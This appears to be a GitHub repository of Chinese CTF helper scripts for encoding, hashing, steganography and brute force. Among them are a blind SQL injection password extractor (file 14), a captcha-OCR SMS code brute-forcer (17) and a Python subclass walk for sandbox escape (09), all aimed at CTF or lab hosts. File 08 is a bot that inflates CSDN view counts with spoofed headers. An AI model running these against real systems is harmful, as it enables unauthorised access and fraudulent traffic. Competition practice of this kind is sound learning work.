├── 00.README.md ├── 01.字符串转换成二维码.py ├── 02.base64隐写.py ├── 03.Base家族加密解密.py ├── 04.CRC32碰撞.py ├── 05.MD5.py ├── 06.post快速反弹.py ├── 07.rot13.py ├── 08.test.py ├── 09.遍历找os模块.py ├── 10.词频统计.py ├── 11.根据CRC爆破宽高.py ├── 12.进制及ascii转换.py ├── 13.九键密码解密.py ├── 14.盲注判断密码.py ├── 15.伪随机数.py ├── 16.压缩包解密.py ├── 17.验证码识别.py ├── rot13.py └── test.png /00.README.md: -------------------------------------------------------------------------------- 1 | # CTF-python-script 2 | CTF常用python脚本 3 | -------------------------------------------------------------------------------- /01.字符串转换成二维码.py: -------------------------------------------------------------------------------- 1 | from PIL import Image 2 | MAX = 25 #宽高 625个01字符串,所以宽和高是25 3 | pic = Image.new("RGB",(MAX, MAX)) 4 | #若是(255,255,255)、(0,0,0)需要先转换01 5 | str = "1111111000100001101111111100000101110010110100000110111010100000000010111011011101001000000001011101101110101110110100101110110000010101011011010000011111111010101010101111111000000001011101110000000011010011000001010011101101111010101001000011100000000000101000000001001001101000100111001111011100111100001110111110001100101000110011100001010100011010001111010110000010100010110000011011101100100001110011100100001011111110100000000110101001000111101111111011100001101011011100000100001100110001111010111010001101001111100001011101011000111010011100101110100100111011011000110000010110001101000110001111111011010110111011011" 6 | i=0 7 | for y in range (0,MAX): 8 | for x in range (0,MAX): 9 | if(str[i] == '1'): 10 | pic.putpixel([x,y],(0, 0, 0)) 11 | else: 12 | pic.putpixel([x,y],(255,255,255)) 13 | i = i+1 14 | pic.show() 15 | pic.save("./flag.png") -------------------------------------------------------------------------------- /02.base64隐写.py: -------------------------------------------------------------------------------- 1 | #coding=UTF-8 2 | #python2下运行,适用于很多base64且解密base64得不到有用的信息的情况 3 | 4 | def get_base64_diff_value(s1, s2): 5 | base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' 6 | res = 0 7 | for i in xrange(len(s1)): 8 | if s1[i] != s2[i]: 9 | return abs(base64chars.index(s1[i]) - base64chars.index(s2[i])) 10 | return res 11 | 12 | def solve_stego(): 13 | 14 | with open('./test.txt', 'rb') as f: 15 | file_lines = f.readlines() 16 | 17 | bin_str = '' 18 | for line in file_lines: 19 | steg_line = line.replace('\n', '') 20 | norm_line = line.replace('\n', '').decode('base64').encode('base64').replace('\n', '') 21 | diff = get_base64_diff_value(steg_line, norm_line) 22 | 23 | pads_num = steg_line.count('=') 24 | if diff: 25 | #print bin(diff) 26 | bin_str += bin(diff)[2:].zfill(pads_num * 2) 27 | 28 | else: 29 | bin_str += '0' * pads_num * 2 30 | 31 | res_str = '' 32 | 33 | for i in xrange(0, len(bin_str), 8): 34 | 35 | res_str += chr(int(bin_str[i:i+8], 2)) 36 | print res_str 37 | 38 | solve_stego() -------------------------------------------------------------------------------- /03.Base家族加密解密.py: -------------------------------------------------------------------------------- 1 | import base36 2 | import base58 3 | import base62 4 | import base64 5 | import base91 6 | import py3base92 #由于python3不兼容base92,此为github上的一个项目 7 | 8 | 9 | 10 | def encode(txt): 11 | print("[+]input is ", end="") 12 | print(txt) 13 | 14 | print("==============================================================================") 15 | #base16 16 | print("[成功]base16 encode: ", end="") 17 | print(base64.b16encode(txt)) 18 | 19 | #base32 20 | print("[成功]base32 encode: ", end="") 21 | print(base64.b32encode(txt)) 22 | 23 | 24 | #base36 25 | try: 26 | base36_m_str = bytes.decode(txt) 27 | base36_m_int = int(base36_m_str) 28 | 29 | base36_cipher = base36.dumps(base36_m_int) 30 | print("[成功]base36 encode: ", end="") 31 | print(base36_cipher) 32 | except Exception as e: 33 | print("[失败]base36 encode: ", end="") 34 | print("base36加密只支持整数数字") 35 | 36 | #base58 37 | print("[成功]base58 encode: ", end="") 38 | print(base58.b58encode(txt)) 39 | 40 | #base62 41 | print("[成功]base62 encode: ", end="") 42 | print(base62.encodebytes(txt)) 43 | 44 | #base64 45 | print("[成功]base64 encode: ", end="") 46 | print(base64.b64encode(txt)) 47 | 48 | #base85 49 | print("[成功]base85 encode: ", end="") 50 | print(base64.b85encode(txt)) 51 | 52 | #base91 53 | print("[成功]base91 encode: ", end="") 54 | print(base91.encode(txt)) 55 | 56 | #base92 57 | print("[成功]base92 encode: ", end="") 58 | print(py3base92.encode(txt)) 59 | 60 | 61 | def decode(txt): 62 | print("[+]input is ", end="") 63 | print(txt) 64 | print("==============================================================================") 65 | 66 | #base16 67 | try: 68 | base16_decode = base64.b16decode(txt) 69 | print("[成功]base16 decode: ", end="") 70 | print(base16_decode) 71 | print() 72 | except Exception as e: 73 | print("[失败]base16 decode: ", end="") 74 | print(e) 75 | 76 | 77 | #base32 78 | try: 79 | base32_decode = base64.b32decode(txt) 80 | print("[成功]base32 decode: ", end="") 81 | print(base32_decode) 82 | print() 83 | except Exception as e: 84 | print("[失败]base32 decode: ", end="") 85 | print(e) 86 | 87 | 88 | #base36 89 | try: 90 | base36_decode = base36.loads(txt) 91 | print("[成功]base36 decode: ", end="") 92 | print(base36_decode) 93 | print() 94 | except Exception as e: 95 | print("[失败]base36 decode: ", end="") 96 | print(e) 97 | 98 | 99 | #base58 100 | try: 101 | base58_decode = base58.b58decode(txt) 102 | print("[成功]base58 decode: ", end="") 103 | print(base58_decode) 104 | print() 105 | except Exception as e: 106 | print("[失败]base58 decode: ", end="") 107 | print(e) 108 | 109 | 110 | #base62 111 | try: 112 | base62_c_string = bytes.decode(txt) 113 | base62_decode = base62.decodebytes(base62_c_string) 114 | print("[成功]base62 decode: ", end="") 115 | print(base62_decode) 116 | print() 117 | except Exception as e: 118 | print("[失败]base62 decode: ", end="") 119 | print(e) 120 | 121 | 122 | #base64 123 | try: 124 | base64_decode = base64.b64decode(txt) 125 | print("[成功]base64 decode: ", end="") 126 | print(base64_decode) 127 | print() 128 | except Exception as e: 129 | print("[失败]base64 decode: ", end="") 130 | print(e) 131 | 132 | 133 | #base85 134 | try: 135 | base85_decode = base64.a85decode(txt).decode() 136 | print("[成功]base85 decode: ", end="") 137 | print(base85_decode) 138 | print() 139 | except Exception as e: 140 | print("[失败]base85 decode: ", end="") 141 | print(e) 142 | 143 | 144 | #base91 145 | try: 146 | base91_decode = base91.decode(str(txt, encoding="utf-8")).decode() 147 | print("[成功]base91 decode: ", end="") 148 | print(base91_decode) 149 | print() 150 | except Exception as e: 151 | print("[失败]base91 decode: ", end="") 152 | print(e) 153 | 154 | 155 | 156 | #base92 157 | try: 158 | base92_decode = py3base92.decode(str(txt, encoding="utf-8")) 159 | print("[成功]base92 decode: ", end="") 160 | print(base92_decode) 161 | print() 162 | except Exception as e: 163 | print("[-]base92 decode: ", end="") 164 | print(e) 165 | 166 | 167 | 168 | 169 | if __name__ == '__main__': 170 | print("Welcome to base series encode and decode") 171 | txt = input("Please input your string ::: ") 172 | 173 | 174 | txt = str.encode(txt) 175 | flag = input("Please input encode(1) or decode(回车) ::: ") 176 | 177 | if(flag == "1"): 178 | encode(txt) 179 | else: 180 | decode(txt) 181 | -------------------------------------------------------------------------------- /04.CRC32碰撞.py: -------------------------------------------------------------------------------- 1 | import binascii 2 | 3 | dic = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+- ={}[]" 4 | crc = 0x3DACAC6B 5 | for i in dic : 6 | for j in dic: 7 | for p in dic: 8 | for q in dic: 9 | for a in dic: 10 | s=i+j+p+q+a 11 | if crc == (binascii.crc32(s) & 0xffffffff): 12 | print s 13 | -------------------------------------------------------------------------------- /05.MD5.py: -------------------------------------------------------------------------------- 1 | #MD5加密 2 | import hashlib 3 | def MD5(str): 4 | hl = hashlib.md5() 5 | hl.update(str.encode(encoding='utf-8')) 6 | return hl.hexdigest() 7 | a="1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%93%D0w%C9Ur%C1%89y+u%EB%A3c%28%D4Z%CF%E8%0E%F1%B9%5D%D4%FBy%7C%5D%8F%B2A%C6%02%AC%C0%09X%E6%5C%EC%E79b%824fko%00%06%2C%1F%03%8F%AD%91%BD%92%18%C2%B8%8C0%A7u9.%CA_%922%C3%15%3BN%E4%F45%3DD%A6t%60E%5B%CA%02N%1E%5Drw%CC%7C%7D%CEU%107%F8%BC%B37%E7%8EW%C9i%9B%3C%F6%FD%CA%A0%E6Du%C4%A3%25%B7%DD%E1a8c%05f" 8 | b="1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%93%D0w%C9Ur%C1%89y+u%EB%A3c%28%D4Z%CF%E8%8E%F1%B9%5D%D4%FBy%7C%5D%8F%B2A%C6%02%AC%C0%09X%E6%5C%EC%E79b%824%E6ko%00%06%2C%1F%03%8F%AD%91%BD%92%18B%B8%8C0%A7u9.%CA_%922%C3%15%3BN%E4%F45%3DD%A6t%60%C5%5B%CA%02N%1E%5Drw%CC%7C%7D%CEU%107%F8%BC%B37%E7%8EW%C9i%9B%BC%F5%FD%CA%A0%E6Du%C4%A3%25%B7%DD%E1%E18c%05f" 9 | 10 | print(MD5(a)) 11 | print(MD5(b)) 12 | #215962017 if ($md5==md5($md5)) 13 | # for i in range(999999999999): 14 | # y=True 15 | # a=MD5("0e"+str(i)) 16 | # b=a[2:] 17 | # if(a[:2]=="0e"): 18 | # for x in b: 19 | # if(ord(x)>=97 and ord(x)<=102): 20 | # y=False 21 | # continue 22 | # if(y): 23 | # print(i) 24 | # break 25 | 26 | 27 | # print(MD5("abd")) 28 | # for i in range(9999999,9999999999): 29 | # if(MD5(str(i))[:6]=="5ca419"): 30 | # print(i) 31 | # break -------------------------------------------------------------------------------- /06.post快速反弹.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import random 4 | import string 5 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 6 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 7 | 8 | # url = 'https://ordinal-scale.hgame.n3ko.co/game.php' # 链接 9 | # s = requests.Session() # 创建session对象 10 | # html = s.get(url).text # get请求, html保存请求的页面内容 11 | # expression = re.compile(r'(?<=
).*(?=\=)').findall(html) #从html中匹配表达式(要计算的式子)?<=
表示开头是
12 | # payload = {'value': eval(expression[0])} # eval计算式子(匹配出来的是列表所以用[0])并构造post请求的data部分 13 | # flag = s.post(url, data=payload) # post带参数提交 14 | # flag.encoding = 'utf-8' #'utf-8'格式 15 | # print(flag.text) 16 | 17 | 18 | 19 | 20 | url = 'http://ha1cyon-ctf.fun:30197/login.php' 21 | 22 | 23 | flag = requests.post(url, data=payload) 24 | flag.encoding = 'utf-8' 25 | # expression = re.compile(r'(?<=
).*(?=
)').findall(html) 26 | print(flag.text) 27 | 28 | 29 | 30 | ''' 31 | #配合php代码 32 | phpText = requests.get('http://127.0.0.1:88/php%e8%84%9a%e6%9c%ac/rand.php') 33 | 34 | #设置cookie、referer等 35 | header = {"Cookie":"PHPSESSID=294a9b966570ae34347a613e894d3271","Referer":"http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/index.php"} 36 | flag = s.post(url, data=payload,headers=header) 37 | 38 | ''' 39 | 40 | -------------------------------------------------------------------------------- /07.rot13.py: -------------------------------------------------------------------------------- 1 | # 导入所需库 2 | import string 3 | 4 | def rot13(text): 5 | """ 6 | 实现ROT13加密解密的函数。 7 | 8 | 参数: 9 | text (str): 需要进行ROT13转换的文本。 10 | 11 | 返回: 12 | str: 经过ROT13转换的文本。 13 | """ 14 | # 定义ROT13转换表,大小写字母分别处理 15 | rot13_trans = str.maketrans( 16 | string.ascii_uppercase + string.ascii_lowercase, 17 | string.ascii_uppercase[13:] + string.ascii_uppercase[:13] + 18 | string.ascii_lowercase[13:] + string.ascii_lowercase[:13] 19 | ) 20 | # 使用转换表进行转换 21 | return text.translate(rot13_trans) 22 | 23 | # 读取用户输入 24 | input_text = input("请输入要进行 ROT13 转换的文本: ") 25 | 26 | # 调用函数并输出结果 27 | encoded_text = rot13(input_text) 28 | print("转换后的文本为:", encoded_text) 29 | -------------------------------------------------------------------------------- /08.test.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # CSDN刷访客 3 | # Author: 夏日 4 | # 分为指定url和遍历所有文章两种模式 5 | # github: https://github.com/zss192/CTF-python-script/blob/master/csdn%E5%88%B7%E8%AE%BF%E5%AE%A2.py 6 | 7 | import re 8 | import requests 9 | import time 10 | import random 11 | 12 | 13 | user_agent_list=[ 14 | 'Mozilla/5.0(compatible;MSIE9.0;WindowsNT6.1;Trident/5.0)', 15 | 'Mozilla/4.0(compatible;MSIE8.0;WindowsNT6.0;Trident/4.0)', 16 | 'Mozilla/4.0(compatible;MSIE7.0;WindowsNT6.0)', 17 | 'Opera/9.80(WindowsNT6.1;U;en)Presto/2.8.131Version/11.11', 18 | 'Mozilla/5.0(WindowsNT6.1;rv:2.0.1)Gecko/20100101Firefox/4.0.1', 19 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER', 20 | 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)', 21 | 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0', 22 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.3.4000 Chrome/30.0.1599.101 Safari/537.36', 23 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 UBrowser/4.0.3214.0 Safari/537.36' 24 | ] 25 | referer_list=[ 26 | 'https://blog.csdn.net/zss192/article/details/104144885', 27 | 'http://blog.csdn.net/', 28 | 'https://blog.csdn.net/zss192', 29 | 'https://blog.csdn.net/zss192/article/details/104144006' 30 | ] 31 | 32 | def shua(url): 33 | header={ 34 | 'User-Agent':random.choice(user_agent_list), 35 | 'Referer':random.choice(referer_list) 36 | } 37 | s = requests.Session() # 创建session对象 38 | html = s.get(url, headers=header).text # get请求获取全部文本 39 | title = re.compile(r'(?<=

).*(?=<\/h1>)').findall(html) 40 | views = re.compile(r'(?<=).*(?=<\/span>)').findall(html) 41 | print("标题:"+str(title)+str(views)) 42 | 43 | ### 44 | #指定文章访问 45 | #times:遍历所有文章的次数 46 | #space:每轮时间间隔(不要太快,经测试60最佳) 47 | #urls:输入要刷的每个url,用逗号间隔,无数量限制 48 | ### 49 | def main(times,space,*urls): 50 | for i in range(1,times+1): 51 | print("第"+str(i)+"次请求 ") 52 | for url in urls: 53 | shua(url) 54 | time.sleep(space) 55 | 56 | ### 57 | #遍历博客所有文章 58 | #url:https://blog.csdn.net/zss192 59 | #times:遍历所有文章的次数 60 | #space:每篇文章访问间隔(不要太快只要保证第二轮访问间隔一分钟即可) 61 | ### 62 | def sumShua(url,times,space): 63 | flag = requests.get(url) 64 | flag.encoding = 'utf-8' 65 | html=flag.text 66 | ls = re.findall(r""+url+"/article/details/\d*", html) 67 | ls = list(set(ls)) 68 | for i in range(1,times+1): 69 | print("第"+str(i)+"次请求 ") 70 | for url in ls: 71 | shua(url) 72 | time.sleep(space) 73 | 74 | 75 | #sumShua(url,times,space) 76 | sumShua("https://blog.csdn.net/zss192",2,1) 77 | 78 | 79 | #main(times,space,url...) 80 | # main(150,60, 81 | # "https://blog.csdn.net/zss192/article/details/105436623", 82 | # "https://blog.csdn.net/zss192/article/details/105393747", 83 | # "https://blog.csdn.net/zss192/article/details/105376347", 84 | # "https://blog.csdn.net/zss192/article/details/105362282", 85 | # ) 86 | 87 | 88 | -------------------------------------------------------------------------------- /09.遍历找os模块.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | cnt=0 5 | for item in [].__class__.__base__.__subclasses__(): 6 | try: 7 | if 'os' in item.__init__.__globals__: 8 | print cnt,item 9 | cnt+=1 10 | except: 11 | print "error",cnt,item 12 | cnt+=1 13 | continue -------------------------------------------------------------------------------- /10.词频统计.py: -------------------------------------------------------------------------------- 1 | f=open("out.txt",'r') 2 | a=f.read() 3 | 4 | d3=dict() 5 | for x in a: 6 | d3[x]=a.count(x) 7 | 8 | list1= sorted(d3.items(),key=lambda x:x[1]) 9 | print(list1) 10 | f.close() -------------------------------------------------------------------------------- /11.根据CRC爆破宽高.py: -------------------------------------------------------------------------------- 1 | ##用于根据CRC爆破宽和高,修改相应值使图片正常显示, 2 | ##宽高错误时,linux下打不开图片,win可以 3 | import zlib 4 | import struct 5 | 6 | filename = 'test.png' 7 | with open(filename, 'rb') as f: 8 | all_b = f.read() 9 | crc32key = int(all_b[29:33].hex(),16) 10 | data = bytearray(all_b[12:29]) 11 | n = 4095 #理论上0xffffffff,但考虑到屏幕实际/cpu,0x0fff就差不多了 12 | for w in range(n): #高和宽一起爆破 13 | width = bytearray(struct.pack('>i', w)) #q为8字节,i为4字节,h为2字节 14 | for h in range(n): 15 | height = bytearray(struct.pack('>i', h)) 16 | for x in range(4): 17 | data[x+4] = width[x] 18 | data[x+8] = height[x] 19 | crc32result = zlib.crc32(data) 20 | if crc32result == crc32key: 21 | print("宽为:",end="") 22 | print(width) 23 | print("高为:",end="") 24 | print(height) 25 | exit(0) 26 | 27 | 28 | -------------------------------------------------------------------------------- /12.进制及ascii转换.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import re 3 | def shiZhuanAscii(ls): #十进制列表转ascii 4 | flag='' 5 | for i in ls: 6 | flag=flag+chr(int(i)) 7 | return flag 8 | def erZhuanShi(ls): #二进制列表转十进制列表 9 | for i in range(len(ls)): 10 | ls[i]=int(ls[i],2) 11 | return ls 12 | def splitS(s,n): #把字符s每n个分到一个列表元素 13 | ls=re.findall('.{'+str(n)+'}', s) 14 | return ls 15 | 16 | #示例: 17 | 18 | s="011100100110000101110010001011010111000001100001011100110111001101110111011001000011101000110000011000010110001100110001011001100110010100110110011000100011011100110111011000100110010100110101011001000110001001100101" 19 | ls=splitS(s,8) #['1100110', '1101100', '1100001', '1100111', '1111011', '1010111', '0110000', '1010111', '0101010', '1100110', '1110101', '1101110', '1101110', '1111001', '1111101'] 20 | ls=erZhuanShi(ls) #[102, 108, 97, 103, 123, 87, 48, 87, 42, 102, 117, 110, 110, 121, 125] 21 | ls=shiZhuanAscii(ls) #flag{W0W*funny} 22 | print(ls) 23 | 24 | # s="52 14 51 44 14 55 41 43 53 14 42 52 15 42 14 55 53 13 15 43 53 13 21 42 45 54 22 12 33" 25 | # ls=s.split(" ") 26 | # print(shiZhuanAscii(ls)) 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /13.九键密码解密.py: -------------------------------------------------------------------------------- 1 | #键盘密码解密 2 | 3 | chiper='999*666*88*2*777*33*6*999*4*444*777*555*333*777*444*33*66*3*7777' 4 | chiper=chiper.split('*') #用*隔开 5 | 6 | keys=['1','2','3','4','5','6','7','8','9'] #有可能是q代表1,w代表2这种,修改这行即可 7 | values=[1,2,3,4,5,6,7,8,9] 8 | dicts=dict(zip(keys,values)) 9 | 10 | jiugongge=[' ','abc','def','ghi','jkl','mno','pqrs','tuv','wxyz'] 11 | new_dicts=dict(zip(values,jiugongge)) 12 | 13 | for i in range(len(chiper)): 14 | temp=dicts.get(chiper[i][0]) #temp=9,6,8,2.... 15 | print(''.join(new_dicts[temp][len(chiper[i])-1]),end='') #先找到9对应的为wxyz,再根据999的个数取第len-1个 -------------------------------------------------------------------------------- /14.盲注判断密码.py: -------------------------------------------------------------------------------- 1 | import time 2 | import requests 3 | 4 | url="http://fed28533-eed0-4dbc-8446-36d87747cd17.node3.buuoj.cn/index.php" 5 | result=[] 6 | for k in range(1,20): 7 | for i in range(65,126): 8 | payload={"username":"\\","password":'or (ascii(substr(password,'+str(k)+',1))>'+str(i)+')#'} 9 | # {'username': '\\', 'password': 'or (ascii(substr(password,1,1))>65)#'} 循环判断密码第n位的ascii码值 10 | req=requests.post(url=url,data=payload) 11 | time.sleep(0.5) 12 | if("P3" in req.text): #当语句正确时页面中含有P3 13 | print(chr(i)) 14 | result.append(chr(i)) 15 | print(result) 16 | break #找到第一位密码,接着判断第二位 17 | print(result,end="") 18 | -------------------------------------------------------------------------------- /15.伪随机数.py: -------------------------------------------------------------------------------- 1 | # 适用于mt_srand(seed)然后后面的mt_rand(这里有一个范围) 2 | 3 | str1='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' 4 | str2='KVQP0LdJKRaV3n9D' 5 | str3 = str1[::-1] 6 | length = len(str2) 7 | res='' 8 | for i in range(len(str2)): 9 | for j in range(len(str1)): 10 | if str2[i] == str1[j]: 11 | res+=str(j)+' '+str(j)+' '+'0'+' '+str(len(str1)-1)+' ' 12 | break 13 | print(res) 14 | 15 | # 求出的结果在kali中输入./php_mt_seed 求得的res即可 16 | # eg: ./php_mt_seed 18 18 0 61 15 15 0 61 50 50 0 61 10 10 0 61 43 43 0 61 13 13 0 61 27 27 0 61 52 52 0 61 5 5 0 61 61 61 0 61 17 | 18 | 19 | 20 | # if(!isset($_SESSION['seed'])){ 21 | # $_SESSION['seed']=rand(0,999999999); 22 | # } 23 | 24 | # mt_srand($_SESSION['seed']); 25 | # $str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"; 26 | # $str=''; 27 | # $len1=20; 28 | # for ( $i = 0; $i < $len1; $i++ ){ 29 | # $str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1); 30 | # } 31 | # $str_show = substr($str, 0, 10); 32 | # echo "

".$str_show."

"; -------------------------------------------------------------------------------- /16.压缩包解密.py: -------------------------------------------------------------------------------- 1 | import zipfile 2 | import os 3 | 4 | name = '0653' 5 | tmp="" #解压过的文件 6 | while True: 7 | fz = zipfile.ZipFile(name + '.zip', 'r') #打开压缩包 8 | fz.extractall(pwd=bytes(name, 'utf-8')) #解密 9 | tmp=name+".zip" 10 | os.remove(tmp) 11 | name = fz.filelist[0].filename[0:4] #获取压缩包里的文件名 12 | fz.close() -------------------------------------------------------------------------------- /17.验证码识别.py: -------------------------------------------------------------------------------- 1 | #代码不能再sublime下运行,会报错,在idle下运行即可 2 | #更推荐用Pkav HTTP Fuzzer爆破验证码 3 | 4 | import requests #调用url、cookie操作 文件操作的库 5 | import sys 6 | import time 7 | from pytesseract import * 8 | from PIL import Image 9 | 10 | def vcode(pic_url,cookies): 11 | r = requests.get(pic_url, cookies=cookies, timeout=10) 12 | with open('vcode.png', 'wb') as pic: 13 | pic.write(r.content) 14 | image=Image.open('vcode.png') 15 | im = image_to_string(image) 16 | #print im 17 | im = im.replace(' ', '') 18 | if im.isdigit() and len(im)==4: 19 | return im 20 | else: 21 | return vcode(pic_url,cookies) 22 | 23 | cookies = {'PHPSESSID':'c460c2f1424af9e7b503c90e3d54c9e4'} 24 | payload = {'username': '13388886666', 'mobi_code': '100','user_code':'5053','Login':'submit'} 25 | 26 | picurl='http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php' #验证码地址 27 | 28 | url="http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php" #请求地址 29 | 30 | 31 | for i in range(100,999): 32 | code1=vcode(picurl,cookies) 33 | payload['user_code']=code1 #验证码 34 | payload['mobi_code']=i 35 | wp = requests.post(url, data=payload,cookies=cookies, timeout=10) 36 | text=wp.content 37 | responsetxt = text.decode() #返回的文本 38 | 39 | if 'error' not in responsetxt: 40 | print('The correct code is:', code1,responsetxt) 41 | break 42 | else: 43 | print('tring code:', i, code1,responsetxt) 44 | 45 | print("get flag success") 46 | -------------------------------------------------------------------------------- /rot13.py: -------------------------------------------------------------------------------- 1 | # 导入所需库 2 | import string 3 | 4 | def rot13(text): 5 | """ 6 | 实现ROT13加密解密的函数。 7 | 8 | 参数: 9 | text (str): 需要进行ROT13转换的文本。 10 | 11 | 返回: 12 | str: 经过ROT13转换的文本。 13 | """ 14 | # 定义ROT13转换表,大小写字母分别处理 15 | rot13_trans = str.maketrans( 16 | string.ascii_uppercase + string.ascii_lowercase, 17 | string.ascii_uppercase[13:] + string.ascii_uppercase[:13] + 18 | string.ascii_lowercase[13:] + string.ascii_lowercase[:13] 19 | ) 20 | # 使用转换表进行转换 21 | return text.translate(rot13_trans) 22 | 23 | # 读取用户输入 24 | input_text = input("请输入要进行 ROT13 转换的文本: ") 25 | 26 | # 调用函数并输出结果 27 | encoded_text = rot13(input_text) 28 | print("转换后的文本为:", encoded_text) 29 | -------------------------------------------------------------------------------- /test.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zss192/CTF-python-script/3418af354f45e323c00a725c69262a137e22664b/test.png --------------------------------------------------------------------------------